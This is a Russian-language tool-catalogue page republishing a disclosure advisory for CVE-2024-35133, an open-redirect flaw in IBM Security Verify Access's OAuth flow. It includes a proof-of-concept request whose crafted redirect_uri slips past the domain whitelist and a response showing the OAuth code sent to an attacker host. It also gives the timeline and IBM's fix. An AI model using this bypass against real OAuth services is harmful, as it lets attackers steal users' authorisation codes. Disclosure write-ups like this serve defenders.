Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/ozozuz/ibm-security-verify-oauth_token_steal-cve-2024-35133
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRed Teaming
GitHubozozuz/ibm-security-verify-oauth_token_steal-cve-2024-35133

IBM-Security-Verify-oAuth_Token_Steal-CVE-2024-35133

Security Bulletin for CVE-2024-35133 - With PoC

Репозиторий

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
21 год назадЕщё не проверено

IBM Security Verify Access - Открытое перенаправление во время OAuth-потока (CVE-2024-35133)

Содержание

  1. Обзор
  2. Подробное описание
  3. Доказательство концепции
  4. Решение
  5. График раскрытия
  6. Ссылки
  7. Авторы
  8. Правовые уведомления

Обзор

Revision: 1.0
Воздействие:
Убедив жертву посетить специально созданный веб-сайт, удаленный злоумышленник может использовать эту уязвимость для подмены отображаемого URL и перенаправления пользователя на вредоносный сайт. Это может позволить злоумышленнику получить информацию высокой степени важности или провести дальнейшие атаки на жертву.

Серьезность:

  • NIST: Высокая
  • IBM: Средняя

Оценка CVSS:

  • NIST: 8.2 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N)
  • IBM: 6.8 (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:H/A:N)

CVE-ID: CVE-2024-35133

Vendor: IBM

Затронутые продукты:

  • IBM Security Verify Access
  • IBM Security Verify Access Docker

Затронутые версии: 10.0.0 - 10.0.8

Описание продукта

IBM Security Verify Access — это комплексное решение для управления политиками авторизации и сетевой безопасности. Оно обеспечивает сквозную защиту ресурсов в географически распределенных интрасетях и экстрасетях.

Некоторые ключевые возможности включают:

  • Аутентификация: Широкий спектр встроенных аутентификаторов и поддержка внешних аутентификаторов.
  • Авторизация: Безопасные решения о разрешении или запрете запросов к защищенным ресурсам.
  • Безопасность данных и централизованное управление ресурсами: Управляет безопасным доступом к внутренним сетевым ресурсам с использованием публичного подключения к Интернету через корпоративную систему брандмауэра.

Подробное описание

В ходе тестирования на проникновение OAuth-потока для клиента была обнаружена уязвимость открытого перенаправления, позволяющая утечку переменной "code" OAuth.

Обходя логику парсера, отвечающего за проверку параметра "redirect_uri" во время OAuth-потока (используя RFC 3986), злоумышленник мог манипулировать фильтром белого списка доменов в IBM Security Verify Access. Это приводило к открытому перенаправлению на любой произвольный домен, контролируемый злоумышленником. Жертва могла быть перенаправлена на вредоносный сайт, при этом домен выглядел доверенным.

Это может привести к раскрытию конфиденциальной информации, такой как токен "code" OAuth, или к дальнейшим атакам на жертву.


Доказательство концепции

Запрос

root@kitploit:~
GET /oauth/oauth20/authorize?response_type=code&client_id=[REDACTED]&state=001710863806728MPUw0xFSj&REDACTED_uri=https://legitimate.domain:[email protected]/[REDACTED]/openid/REDACTED/[REDACTED]&scope=openid+ HTTP/1.1
Host: [REDACTED]
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

Ответ

root@kitploit:~
HTTP/1.1 302 Found 
content-language: en-US 
date: Tue, 19 Mar 2024 16:04:35 GMT 
location: https://legitimate.domain:[email protected]/[REDACTED]/openid/REDACTED/[REDACTED]?state=001710863806728MPUw0xFSj&code=7wkH581y0uyS0nm4ff65zCqHn0WC46w7v&iss=[REDACTED] 
p3p: CP="NON CUR OTPi OUR NOR UNI" 
x-frame-options: DENY 
x-content-type-options: nosniff 
cache-control: no-store 
x-xss-protection: 1; mode=block 
x-permitted-cross-domain-policies: none 
cross-origin-resource-policy: same-site 
content-security-policy: frame-ancestors 'none' 
referrer-policy: no-referrer-when-downgrade 
strict-transport-security: max-age=31536000; includeSubDomains 
pragma: no-cache 
Content-Length: 0.

Решение

Обратитесь к бюллетеню безопасности IBM 7166712 для получения информации об исправлениях, обновлениях или рекомендуемых обходных путях.
См. Ссылки для более подробной информации.


График раскрытия

  • 19/03/2024: Уязвимость обнаружена исследователем безопасности (Giulio Garzia)
  • 21/03/2024: Уязвимость передана клиенту, использующему IBM Security Verify Access
  • 02/04/2024: Уязвимость сообщена IBM
  • 14/05/2024: Уязвимость подтверждена IBM
  • 18/07/2024: Предварительное исправление предоставлено IBM клиенту
  • 27/08/2024: Бюллетень безопасности и уязвимость опубликованы IBM

Ссылки

  1. IBM Security Bulletin CVE-2024-35133
  2. IBM X-Force Vulnerability Database
  3. NIST CVE-2024-35133
  4. CWE-178: Неверная обработка URL

Авторы

Эта уязвимость была обнаружена и сообщена:

  • Giulio Garzia
    LinkedIn
    GitHub

Правовые уведомления

Copyright (c) 2024 Giulio Garzia "Ozozuz"

Разрешается электронное распространение данного уведомления. Оно не может быть отредактировано без явного письменного согласия. Для получения разрешения на перепечатку этого уведомления в других средствах массовой информации обращайтесь к автору.

Отказ от ответственности: Информация в данном рекомендательном сообщении точна на момент публикации на основе имеющихся данных. Никаких гарантий не предоставляется. Ни автор, ни издатель не несут ответственности за прямой, косвенный или последующий ущерб, возникший в результате использования этой информации.

Скачать инструмент